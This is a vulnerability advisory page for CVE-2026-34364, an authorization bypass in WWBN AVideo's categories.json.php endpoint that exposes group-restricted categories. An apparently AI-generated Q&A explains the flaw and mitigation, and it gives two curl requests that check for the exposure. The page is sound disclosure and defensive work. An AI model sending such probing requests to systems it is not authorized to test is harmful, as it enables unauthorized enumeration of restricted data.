CVE-2026-34364
Access Control Bypass in WWBN AVideo categories.json.php Endpoint
Publication date: 2026-03-27
Last updated on: 2026-04-14
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wwbn | avideo | to 26.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-34364 is a vulnerability in the WWBN AVideo open source video platform (versions up to 26.0) affecting the categories.json.php endpoint, which serves the category listing API.
The vulnerability arises because the endpoint fails to enforce user group-based access controls properly. When no user parameter is provided in the request, the filtering by user groups is completely skipped, exposing all non-private categories, including those restricted to specific user groups.
When the user parameter is supplied, a type confusion bug causes the system to use the admin user's group memberships instead of the current user's, making the filtering ineffective and exposing restricted categories.
This means unauthorized users can see categories they should not have access to, including metadata about which groups categories are restricted to.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in WWBN AVideo allows unauthorized users to bypass user group-based access controls and enumerate restricted categories, exposing internal access control configurations. This information disclosure could potentially lead to unauthorized access to sensitive metadata about category restrictions.
While the CVE description and resources do not explicitly mention compliance with standards such as GDPR or HIPAA, the exposure of access control information and potential unauthorized data access could raise concerns under these regulations, which require protection of sensitive data and proper access controls.
Therefore, this vulnerability may negatively impact compliance with data protection regulations by failing to adequately restrict access to category metadata, which could be considered sensitive depending on the context of the data hosted on the platform.
How can this vulnerability impact me? :
This vulnerability allows any unauthenticated or unauthorized user to bypass intended access controls and enumerate all non-private categories, including those restricted to specific user groups.
As a result, sensitive information about category restrictions and internal access control configurations is disclosed.
This information disclosure can facilitate further targeted attacks or unauthorized access attempts on videos within those restricted categories.
The vulnerability has a medium severity rating with a CVSS score of 5.3, indicating a moderate risk primarily due to information disclosure rather than direct content compromise.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to access the categories listing API endpoint without authentication and observing if restricted categories are exposed.
Specifically, sending a request to the `categories.json.php` endpoint without the `?user=` parameter should not return categories restricted to specific user groups. If it does, the system is vulnerable.
Additionally, sending a request with the `?user=1` parameter and checking if the response incorrectly applies admin user group filtering can indicate the presence of the type confusion bug.
- Use a command like: `curl -s 'http://<your-avideo-domain>/objects/categories.json.php'` and check if restricted categories are listed.
- Use a command like: `curl -s 'http://<your-avideo-domain>/objects/categories.json.php?user=1'` and verify if the filtering is incorrectly applied using admin groups.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to update the wwbn/AVideo platform to a version that includes the fix for CVE-2026-34364.
The fix involves modifying the category listing API to always apply user group filtering based on the actual logged-in user's ID, or a sentinel value for guests, preventing unauthorized access to restricted categories.
If updating immediately is not possible, restrict access to the `categories.json.php` endpoint to authenticated users only or implement network-level controls to limit access.
- Apply the patch from commit 6e8a673eed07be5628d0b60fbfabd171f3ce74c9 which corrects the user group filtering logic.
- Ensure that the backend enforces user group membership checks consistently for all category retrieval functions.